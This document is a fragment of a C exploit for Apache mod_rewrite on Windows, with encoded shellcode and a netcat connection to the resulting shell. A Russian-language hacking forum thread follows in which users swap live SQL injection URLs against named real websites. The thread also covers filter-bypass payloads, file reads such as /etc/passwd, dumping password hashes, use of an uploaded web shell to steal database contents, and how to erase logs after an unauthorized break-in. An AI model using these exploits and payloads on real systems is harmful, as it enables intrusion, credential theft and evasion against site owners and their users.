"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x 69\x45\x59\x49"
"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x 47\x50\x53\x74"
"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x 4d\x42\x6b\x75"
"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x 79\x4f\x33\x4e"
"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x 51\x66\x33\x4b"
"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x 59\x6e\x69\x47"
"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x 74\x39\x6f\x76"
"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x 50\x30\x50\x50"
"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x 6f\x63\x65\x66"
"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x 43\x42\x48\x54"
"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x 4a\x32\x30\x32"
"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x 57\x4b\x4f\x72"
"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x 65\x67\x50\x4c"
"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x 30\x33\x30\x4e"
"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x 50\x33\x30\x33"
"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x 61\x4a\x4c\x67"
"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";

char finish[]= "HTTP/1.0\r\nHost: ";

char payload2[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x18"
"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\x f0\x20\xfc\xc5"
"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x 60\xd8\xec\xb1"
"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\x f6\xe8\xc3\xa3"
"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x 23\x8d\x27\x12"
"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x 47\xc5\x02\xd1"
"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x 93\x9a\x33\xb1"
"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x 56\xd7\xef\x6a"
"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x 47\x8d\xfc\xea"
"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x 99\x34\x0b\x38"
"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\x ce\x8a\x50\x69"
"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x 7e\x8a\x8a\xdb"
"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x 4d\x26\xd3\x52"
"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\x fd\x90\x85\x73"
"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x 61\x1f\x7a\x6d"
"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x 91\x3c\x69\x6a"
"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\x b2\x27\x41\x17"
"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\x e6\x6a\x15\xc5"
"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x 49\x88\x56\x6b"
"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\x e7\xee\xfc\xea"
"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\x e8\x53\x07\x65"
"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";

int main(int argc, char *argv[])
{
int sockfd, numbytes;
char buf[MAXDATASIZE];
struct hostent *he;
struct sockaddr_in their_addr;
printf(" Exploit: apache mod rewrite exploit (win32)\n"
" By: fabio/b0x (oc-192, old CoTS member)\n"
"Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n"
);
if (argc != 3) {
printf(" Usage: ./apache hostname rewrite_path\n");
exit(1);
}
printf("\n[+]Preparing payload\n");

char payload[748];
sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]);

printf("[+]Connecting...\n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname...\n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error...\n");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect\n");
exit(1);
}
printf("[+]Connected\n[+]Sending...\n");
if (send(sockfd, payload, strlen(payload), 0) == -1){
printf("[-]Unable to send\n");
exit(1);
}
printf("[+]Sent\n");
close(sockfd);
printf("[+]Starting second stage...\n");
sleep(3);
printf("[+]Connecting...\n");
if ((he=gethostbyname(argv[1])) == NULL) {
printf("[-]Cannot resolv hostname...\n");
exit(1);
}
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-]Socket error...\n");
exit(1);
}

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT2);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
if (connect(sockfd, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1) {
printf("[-]Unable to connect\n");
exit(1);
}
printf("[+]Connected\n[+]Sending...\n");
if (send(sockfd, payload2, strlen(payload2), 0) == -1){
printf("[-]Unable to send\n");
exit(1);
}
printf("[+]Sent\n[+]Connecting to shell\n");
close(sockfd);

sleep(3);
int exec;
char what[1024];
sprintf(what," nc -w 10 %s 4445",argv[1]);
exec=system(what);
if (exec!=0){
printf("[-]Not hacked\n");
} else {
printf("[+]Owned\n");
}
exit(1);
}

очень прошу ответы в личку, спасибо большое заранее

Попробуй поменять порт, может фаер не пускает коннект...

Есть базы:

Основная(там де все аки)

information_schema

mysql

Проблема в том что взлом идет sql injection building как бы по 1 букве 10к акаунтов неохотно перебирать. Так вот вопрос:

Можно ли через те базы:

information_schema

mysql

вывести инфу о удалённом подключение? Или какую то другую, что б облегчить взлом...

Спасибо огромное...

~{OmRus}~

Да, но большое кол-во условий:

- Есть доступ на чтение mysql.user

- Сбрутишь хэш пассворда

- В host у данного юзера будут разрешены подключения с любого IP

- На сервере открыт 3306порт удаленно

- БД на этом же сервере

SELECT user,password,host FROM mysql.user

Вероятность крайне мала.

Как я понял, вся проблема в том, что у тебя Blind SQLi.

/thread119047.html

Методы с find_in_set вполне ускоряют дамп.

Подскажите:

сайт ругается на попытку инъекции "AND+1=2+union+select+1,2+--+1" вещами вроде "5ade" в начале страницы.

Что это значит? На разные запросы разные 4 символьные "коды".

помогите мне м такой проблемой,нашел sql-inj выводит ошибку

HS+ design is temporarily unavailable

The following errors has been found:

HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3 (# 256).

The following will be reported to the Administrator:

Error in line 7 of file /var/www/html/PHPscripts/error_inc.php

Я так понимаю /var/www/ это полный путь к сайту.Составляю запрос на вывод файла /var/www/index.html мне выдает ошибку.А при выводе файла /etc/passwd всё нормально выводится,может я неправильно нашел полный путь до корня?

Facecontrol said:
помогите мне м такой проблемой,нашел sql-inj выводит ошибку
HS+ design is temporarily unavailable
The following errors has been found:
HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3 (# 256).
The following will be reported to the Administrator:
Error in line 7 of file /var/www/html/PHPscripts/error_inc.php
Я так понимаю /var/www/ это полный путь к сайту.Составляю запрос на вывод файла /var/www/index.html мне выдает ошибку.А при выводе файла /etc/passwd всё нормально выводится,может я неправильно нашел полный путь до корня?


Полный путь /var/www/html/.

Держи:


PHP:
http://www.hsplusdesign.be/itemviewer.php?id=-113+union+select+1,2,3,load_file%280x2f7661722f777 7772f68746d6c2f696e6465782e68746d6c%29,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21--

Спасибо,а как ты понял что это полный путь к корню?

Facecontrol said:
Спасибо,а как ты понял что это полный путь к корню?


Немного перефразирую, чтобы было понятнее - /var/www/html/ - полный путь до конкретно интересующего тебя файла, про который ты спросил а именно index.html

А так, да, корень сайта находится по /var/www/.

Как понял? Ну, очевидно же, что если index.html не лежит в /var/www/, то единственным местом, где он может находится будет /var/www/html/

Fatal error: Cannot use string offset as an array in /home/www/artwork/stroyprofi.ru/include/tree.inc on line 66


таки никак? раз идет проверка на то, какое значение ввожу, да?

Нашел уязвимость на сайте, а там хостинг от sweb. Кто не знает, там есть фильтрация, некая защита от хакеров.

Дело в том, что там фильтруется FROM. Как мне поступить в данной ситуации?

kise said:
Нашел уязвимость на сайте, а там хостинг от sweb. Кто не знает, там есть фильтрация, некая защита от хакеров.
Дело в том, что там фильтруется FROM. Как мне поступить в данной ситуации?


Там фильтруется не только `FROM`. У них реализуется на уровне веб-сервера или демона эта шляпа. Очень жесткий фильтр. Ищи места в коде сайта, где данные транскодируются, передаются нестандартными GPC массивами или прямые аплоады и прочие финты ушами. Прямая скуль весьма сомнительно что-что тут тебе даст.

http://www.xakep.ru/howto/53202/Kak-obojti-zacshity-Sweb-i-Peterhost-hostingov.htm

Нашел статью, но походу они начали и POST фильтровать...

------------

Кто какие знает уязвимости в Next Gen CMS?

kise said:
Кто какие знает уязвимости в Next Gen CMS?


Продукт: Next Gen CMS

Версия: 0.9.3 Release [SVN880+FIX01] (Последняя на данный момент)

Уязвимость: XSS Активные

При добавлении новости

Уязвимы поля: "Заголовок", 'тестовый блог


Code:
alert(/xss/)

Требуются права модератора или администратора

() mix0x0

Фильтр при запросе union select.Можно ли как то обойти?

такой вопрос


PHP:
http://good-life.kz/ru/cat.php?id=5'+and(select+1+from(select+count(*),co ncat((select+substr(concat_ws(0x3a,table_schema,ta ble_name,table_rows),1,90)+from+information_schema .tables+where+table_schema!=0x696e666f726d6174696f 6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2)) x+from+information_schema.tables+group+by+x)a)--+

какова он мне выдаёт что возвращается больше одного результата ответа? как исправить?

Code:
http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+dis tinct+table_name+from+information_schema.tables+wh ere+table_schema!=0x696e666f726d6174696f6e5f736368 656d61+limit+1,1),64),rand(0)|0)+having+avg(0)+or'

http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+dis tinct+table_name+from+information_schema.tables+wh ere+table_schema!=0x696e666f726d6174696f6e5f736368 656d61+limit+2,1),64),rand(0)|0)+having+avg(0)+or'

http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+dis tinct+table_name+from+information_schema.tables+wh ere+table_schema!=0x696e666f726d6174696f6e5f736368 656d61+limit+3,1),64),rand(0)|0)+having+avg(0)+or'

http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+dis tinct+table_name+from+information_schema.tables+wh ere+table_schema!=0x696e666f726d6174696f6e5f736368 656d61+limit+4,1),64),rand(0)|0)+having+avg(0)+or'

kingbeef said:
Фильтр при запросе union select.Можно ли как то обойти?


Можно.

1. Запостить сюда ссылку.

2. Заглулить самому WAF Bypass (Есть презентация от Евтеева на этот счет).

Для начало надо определить, что именно фильтруеться.

Просто UNION

Просто SELECT

Связка UNION SELECT

Ну и т.д...

А потом уже действовать.

UNION(SELECT(1),2,version(),(4))

UNION+/*!SELECT*/+1,2,version(),4

/*!UNION+SELECT*/+1,2,version(),4

Попробовать передать данные через POST

Регистр

Вместо пробелов(+) использовать другие символы

И т.д...

Tigger said:
Можно.
1. Запостить сюда ссылку.
2. Заглулить самому WAF Bypass (Есть презентация от Евтеева на этот счет).
Для начало надо определить, что именно фильтруеться.
Просто UNION
Просто SELECT
Связка UNION SELECT
Ну и т.д...
А потом уже действовать.
UNION(SELECT(1),2,version(),(4))
UNION+/*!SELECT*/+1,2,version(),4
/*!UNION+SELECT*/+1,2,version(),4
Попробовать передать данные через POST
Регистр
Вместо пробелов(+) использовать другие символы
И т.д...


http://www.radimpex.rs/download.php?id=-1/*|UnIoN*//*|aLl*//*|SeLeCt*/1--&lang=en

http://www.sin-bad.ru/main.php?f=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+--+


не могу найти куда выводит =/

shadowrun said:
не могу найти куда выводит =/


http://www.sin-bad.ru/main.php?f=10+UnIoN+sElEcT+1,2,3,4,5,6,7,8,9,10,ve rsion(),12,13,14,15,16--+f

В самом низу

4.0.27-log

kingbeef said:
http://www.radimpex.rs/download.php?id=-1/*|UnIoN*//*|aLl*//*|SeLeCt*/1--&lang=en


Это прикол, да?

Что за палки перед операторами?

С чего ты взял, что там фильтр какой-то?

Извините, конечно, но это *facepalm*.

http://www.radimpex.rs/download.php?id=1 and(substring(version(),1,1)=3)&lang=en

Там просто мускул 3ей ветки =\

http://www.radimpex.rs/download.php?id=1 or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -&lang=en

Duplicate entry '3.23.581' for key 1

Tigger said:
Это прикол, да?
Что за палки перед операторами?


Гуглил "WAF Bypass" ,нашел видео и по нему делал с "палками"


Там просто мускул 3ей ветки =\


Спасибо

возникла проблема с выводом приватной информации с похеканного сайта. некоторую информацию выводит нормально, но как только прописываю таблицы с паролями юзеров, сразу перекидывает на главную страницу сайта (и там пропечатывается мой код запроса в каком-нибудь поле). попытался вставить сайт в прогу Havij. она загрузила таблицы и поля. я взял загрузить то поле, которое было с паролями юзеров. но вылезло "Turning off 'bypass illegal union' and retrying". скажите, в чем проблема? я думаю, что нужны права админа. доступ к админке сайта есть

skagen

Кодировка.

Попробуй:

SELECT unhex(hex(version())) FROM ...

Либо другие варианты, описанные в статьях.

такой вопрос, есть логин и пароль от БД, phpmyadmin нету, в строке host стоит знак % тоесть можно подключатся к с любого ипа, но проблема в том что нет открытого 3306 порта. както можно ещо иначе подключится или безнадёжно?

qaz said:
такой вопрос, есть логин и пароль от БД, phpmyadmin нету, в строке host стоит знак % тоесть можно подключатся к с любого ипа, но проблема в том что нет открытого 3306 порта. както можно ещо иначе подключится или безнадёжно?


Проскань порты мб на другом висит.

Но мускуль очень редко смотрит наружу.

mironich said:
Проскань порты мб на другом висит.
Но мускуль очень редко смотрит наружу.


та сканил, всё что есть


PHP:
Discovered open port 25/tcp

Discovered open port 110/tcp

Discovered open port 80/tcp

Discovered open port 53/tcp

Discovered open port 443/tcp

qaz said:
та сканил, всё что есть

PHP:
Discovered open port 25/tcp

Discovered open port 110/tcp

Discovered open port 80/tcp

Discovered open port 53/tcp

Discovered open port 443/tcp




Это не все что есть. Если сайт того стоит - потрать время , потрудись и проскань как можно большее количество портов. Изучи ответ сервера по каждому порту, а не смотри в дамп проги чем ты там сканишь. К тому-же, посмотри в конфигах и реверс IP какие субдомены имеются. Частенько делают базовый домен на который прекрывают порты а к примеру mysql.site.ru открыт для подключения. Опять -же, через реверс IP пробей может зальешься на смежные домены, тогда локально подключишься.

Выкачал папку phpmyadmin с сервера, в ней находятся все базы данных сайтов хостящихся на этом сервере?

http://twocomrades.ru/svn

Уязвимость SVN всех версий

Нами была найдена уязвимость SVN всех версий, с помощью которой можно получить исходные коды проекта.

Уязвимость имеет силу на проектах, исходные коды которого обновляются через SVN и вебсервер не запрещает читать скрытые директории. По умолчанию ни один вебсервер это не делает.

Степень угрозы: средняя/высокая

Архитектура SVN предусматривает хранение метаданных и версионную информацию файла для каждой директории исходных кодов. Данные находятся в метадиректории «.svn». Получив доступ к ней, можно как минимум построить файловое дерево проекта, узнать URL основного репозитория и список пользователей SVN, как максимум — получить доступ к исходным кодам проекта.

Исследование было произведено совместно с Антоном Исайкиным.

Способы защиты

Закрыв доступ на чтение из скрытых директорий на сервере, вы обезопасите себя от подобных уявимостей.

Nginx (лучший вебсервер всех времён и народов, кстати)

location ~ \.svn {

deny all;

}

Apache

Order allow,deny

Deny from all

Satisfy All

SVN

По возможности делать выгрузку исходникиов на продакшен-сервер посредством svn export.

Кто знает подробнее?

ReV0LVeR

http://habrahabr.ru/post/70330/


Chuvash said:
Выкачал папку phpmyadmin с сервера, в ней находятся все базы данных сайтов хостящихся на этом сервере?


Нет. PHPMyAdmin - лишь оболочка.

spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user

http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+

http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8, 9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+

что не так?

Tigger said:
ReV0LVeR
http://habrahabr.ru/post/70330/
Нет. PHPMyAdmin - лишь оболочка.


А где тогда лежат файлы баз данных? просто имеется доступ ко всему диску сервера....

Chuvash, ищи логин и пароль к бд в конфигурационных фаилах таких как *config, config.inc.php и т д , цепляйся к бд делай полный дамп.

Chuvash said:
А где тогда лежат файлы баз данных? просто имеется доступ ко всему диску сервера....



Базы данных физически располагаются в директории указанной в конфигурации msyql сервера. Различия могут быть в зависимости как от дистрибутива, так и опционально указанные при компиляции либо измененные после установки. Смотри my.cnf

Привет, есть вопрос.

Имею скуль типа


Code:
script.php?id=1+or+(select+count(*)+from+(select+1 +union+select+2+union+select+3)x+group+by+concat(( SELECT+password+FROM+tablename+LIMIT+0,1),floor(ra nd(0)*2)))+--+

Есть все основания полагать, что соленый хеш может быть больше 64 символов.

Вопрос- как получить остальные символы, т.к. выдает только первые 64?

fl00der said:
Привет, есть вопрос.
Имею скуль типа

Code:
script.php?id=1+or+(select+count(*)+from+(select+1 +union+select+2+union+select+3)x+group+by+concat(( SELECT+password+FROM+tablename+LIMIT+0,1),floor(ra nd(0)*2)))+--+

Есть все основания полагать, что соленый хеш может быть больше 64 символов.
Вопрос- как получить остальные символы, т.к. выдает только первые 64?


несовсем тебя понял,

1)посмотри их в тругой таблице

2) если как я понял у тебя соль вместе с хешами и стоит ограничение на длину вывода то воспользуйся функцией substr

тут типа c 1-50 символов


Code:
script.php?id=1+or+(select+count(*)+from+(select+1 +union+select+2+union+select+3)x+group+by+concat(( SELECT+substr(password,1,50)+FROM+tablename+LIMIT+ 0,1),floor(rand(0)*2)))+--+

тут типа c 50-100 символов


Code:
script.php?id=1+or+(select+count(*)+from+(select+1 +union+select+2+union+select+3)x+group+by+concat(( SELECT+substr(password,50,100)+FROM+tablename+LIMI T+0,1),floor(rand(0)*2)))+--+

сори если опять туплю)

ребят,подскажите,пожалуйст а...

есть сайт на нем есть файл error.log,в который записываются ошибки БД...на самом сайте вывод ошибок отключен по-видимому...да и найти ошибку,которая фиксировалась бы в файле тоже оказалось сложно...однако,я её нашёл и хотел спросить можно ли с помощью данного файла и правильно составленного запроса залить шелл или вывести хоть какую-ту нужную информацию?

часть файла еррор.лог:


Code:
[15-Apr-2012 18:29:23] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"3000', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='1db420cb93a608c25c4c2990f164ea55'

[15-Apr-2012 19:19:05] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"0000 union select version() --', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='792bce446a531fd049eaa1b174c5ecba'


ошибка возникает в заголовке referer (ref)

HeaVeNSeR said:
ребят,подскажите,пожалуйст а...
есть сайт на нем есть файл error.log,в который записываются ошибки БД...на самом сайте вывод ошибок отключен по-видимому...да и найти ошибку,которая фиксировалась бы в файле тоже оказалось сложно...однако,я её нашёл и хотел спросить можно ли с помощью данного файла и правильно составленного запроса залить шелл или вывести хоть какую-ту нужную информацию?
часть файла еррор.лог:

Code:
[15-Apr-2012 18:29:23] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"3000', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='1db420cb93a608c25c4c2990f164ea55'

[15-Apr-2012 19:19:05] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"0000 union select version() --', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='792bce446a531fd049eaa1b174c5ecba'

ошибка возникает в заголовке referer (ref)


Если кавычки не слешируются, то можешь попробывать реализовать полноценную SQL-иньекцию, если файл сможешь прочитать как пхп код, то сможешь реализовать PHP-иньекцию, экспириментируй, все в твоих руках!

P.S: если не ошибаюсь то кавычки не слешируются...

У меня вот это никак не крутится ни руками, ни софтом.

Там вообще есть что-нибудь?


Code:
http://develop.belta.by/{тут инъекция, видно через ОПЕРУ}

структура запроса


Code:
GET /1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000 Cookie: PHPSESSID=4f4eba22b01c675b1c8b035f10e977ed
Host: develop.belta.by
Connection: Keep-alive
Accept-Encoding: gzip,deflate

Это ошибка вываливается в order by?


Code:
Ошибка при работе с базой данных.
Пожалуйста, обратитесь к администратору.
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near ''''' at line 1

Это ошибка вываливается в order by?


думаю это было утверждение, нежели вопрос)

софтом не будет крутится, так как параметра уязвимого нет. Ну по крайней мере с sqlmap я не пробовал такое вытворять

с order by будет крутиться только если это не error based + 5 версия mysql. В остальных случаях прийдется использовать другие параметры или другой набор слов. Попробуй использовать как параметр phpsessid, то есть сайт/1'&PHPSESSID=значение'

и суй куда нибудь типа того же sqlmap. может поможет

Юзабельно ?




Code:
http://www.softclub.ru/games/game.asp?id=11984'

asiaman

Скуля там в URI.

http://develop.belta.by/1'or(substring(version(),1,1)=5)and'1 - TRUE (Главная страница)

http://develop.belta.by/1'or(substring(version(),1,1)=4)and'1 - FALSE ()

Пробелы в такой скуле использовать нельзя, версия меньше, чем 5.1 (нету ф-ции ExtractValue).

Вывод версии в ошибке:

http://develop.belta.by/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and'1

Duplicate column name '5.0.88-log'

t3cHn0iD

Нет.

http://www.l-craft.ru/catalog.php?c=38+order+by+1+--+


union+select +1+--+ не выводит ничего...

shadowrun said:
union+select +1+--+ не выводит ничего...


blind


Code:
http://www.l-craft.ru/catalog.php?c=38+and+substring(@@version,1,1)=5

Code:
http://intersport.ru/company/countries'

фильтр select и union. как обойти?

justonline said:

Code:
http://intersport.ru/company/countries'

фильтр select и union. как обойти?



URL encode:

http://www.intersport.ru/products/cat/?cat_group_id=24&cat_producer_id=&id=149+or+1+%67%72%6F%75%70+by+concat(%20(%73%65%6 C%65%63%74%20table_name+%66%72%6F%6D+information_s chema.tables+limit+17,1),floor(rand(0)*2))%20havin g%20min(0)--+

-> 1062Duplicate entry 'banners1' for key 1

Помогите, пожалуйста. После после пост запроса email=%5c&pass=451&x=31&y=9 выдается ошибка:

SQL Error(1064): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\' LIMIT 1' at line

1.[SELECT * FROM `member_account` WHERE email = '\' LIMIT 1]

как раскрутить?

залил шелл wso на сайт. как теперь можно попасть в phpmyadmin или узнать данные от него? мне нужно скачать все таблицы с сайта

skagen said:
залил шелл wso на сайт. как теперь можно попасть в phpmyadmin или узнать данные от него? мне нужно скачать все таблицы с сайта


ищи файл с конфигами, или пали обычные файлы.

Потом либо ищи phpmyadmin, либо коннект прямо из wso

skagen said:
залил шелл wso на сайт. как теперь можно попасть в phpmyadmin или узнать данные от него? мне нужно скачать все таблицы с сайта


посмотри в папках есть ли он вобще, просмотри файли на хостинге, в какомто из них должен лежать скрипт для подключения к БД, там ты найдёшь логин пароль и тд. если нет phpmyadmin, то можно написать за 2 минуты простейшый скрипт для слива нужных таблиц,

qaz said:
посмотри в папках есть ли он вобще, просмотри файли на хостинге, в какомто из них должен лежать скрипт для подключения к БД, там ты найдёшь логин пароль и тд. если нет phpmyadmin, то можно написать за 2 минуты простейшый скрипт для слива нужных таблиц,


WSO разве не поддерживает дамп определенных таблиц?

Зачем какие-то скрипты писать...

gl0w said:
WSO разве не поддерживает дамп определенных таблиц?
Зачем какие-то скрипты писать...


а как это осуществить? ведь там же нужны логин и пароль для sql базы

skagen said:
а как это осуществить? ведь там же нужны логин и пароль для sql базы


Идёшь в скрипт с которого начинается процесс отдачи статики пользователю. Ищешь там(или в инклюдах) логин и пароль к базе. Заодно посмотри хост куда идёт подключение.

Melfis said:
Идёшь в скрипт с которого начинается процесс отдачи статики пользователю. Ищешь там(или в инклюдах) логин и пароль к базе. Заодно посмотри хост куда идёт подключение.


вот я слил файл sql.php http://zalil.ru/33088878

не пойму где там логин, пароль и имя хоста

skagen said:
вот я слил файл sql.php http://zalil.ru/33088878
не пойму где там логин, пароль и имя хоста


Тебе нужен скрипт настроек, это просто либа с функциями. Ищи файл, в котором происходит инклюд этого скрипта. Выше строки инклюда (хз насколько выше) должен быть или инклюд конфига (посмотри разные вариации слова "настройки" на английском), или сами настройки подключения к бд.

skagen said:
вот я слил файл sql.php http://zalil.ru/33088878
не пойму где там логин, пароль и имя хоста


Мде...


PHP:
$version='MySQL RST/GHC Manager 2.3';

$copyright='© RusH Security Team © Antichat edition ©';

Сайт до тебя хекали уже.

В index.php ищи инклюд конфига или кидай сюда.

Ereee said:
Мде...

PHP:
$version='MySQL RST/GHC Manager 2.3';

$copyright='© RusH Security Team © Antichat edition ©';

Сайт до тебя хекали уже.
В index.php ищи инклюд конфига или кидай сюда.


почему это хекали? может просто версия базы данных античатовская? или я что то не понимаю? нах в конфиге писать про ачат. про какой индекс ты говоришь? главную страницу сайта? там есть обращение к базе?

В общем, по своей дурости, сегодня взломал сайт не включив впн

Залил шелл, погулял по папкам, заливал файлы, читал файлы, скачивал.

После завершения работы естественно решил вырубить впн, но как оказалось он не был включен...

Как мне почистить логи, особенно со своим ip?

+++

Если не там запостил, извините, не знал куда можно запостить.

Эри, они вроде делали всякие скрипты, посмотри на хакер.ру, там есть какое-то скучное интервью с участником rht.

kise said:
В общем, по своей дурости, сегодня взломал сайт не включив впн
Залил шелл, погулял по папкам, заливал файлы, читал файлы, скачивал.
После завершения работы естественно решил вырубить впн, но как оказалось он не был включен...
Как мне почистить логи, особенно со своим ip?
+++
Если не там запостил, извините, не знал куда можно запостить.
Эри, они вроде делали всякие скрипты, посмотри на хакер.ру, там есть какое-то скучное интервью с участником rht.


бери root и чисти логи, другово не знаю не дано

Как не подскажешь?

Версия ядра - Linux Kernel 2.6.18


OS version: Linux version 2.6.18-1.2798.fc6 (brewbuilder@hs20-bc2-3.build.redhat.com) (gcc version 4.1.1 20061011 (Red Hat 4.1.1-30)) #1 SMP Mon Oct 16 14:54:20 EDT 2006
Distr name:
Fedora Core release 6 (Zod)
Kernel \r on an \m

http://www.w-service.ru/index.php?lnk=links


можно что выжать?

shadowrun said:
можно что выжать?


нет.

Можешь администрации посоветовать выключить вывод ошибок.


kise said:
Версия ядра - Linux Kernel 2.6.18


посмотри следующие темы:

/showthread.php?t=121272

/showthread.php?t=30711

http://www.1337day.com/exploits/17158

kise said:
В общем, по своей дурости, сегодня взломал сайт не включив впн
Залил шелл, погулял по папкам, заливал файлы, читал файлы, скачивал.
После завершения работы естественно решил вырубить впн, но как оказалось он не был включен...
Как мне почистить логи, особенно со своим ip?
+++
Если не там запостил, извините, не знал куда можно запостить.
Эри, они вроде делали всякие скрипты, посмотри на хакер.ру, там есть какое-то скучное интервью с участником rht.


Буржуйский сайт? Тогда спи спокойно.

Котенок Кисс думает... сделав тройное сальто, говорит, что надо сказать о уязвимости админам, тогда они поблагодарят тебя, а ты спасаешь жопу. Уж блиц-то знает, с такой датой регистрации в интернете.

gl0w said:
WSO разве не поддерживает дамп определенных таблиц?
Зачем какие-то скрипты писать...


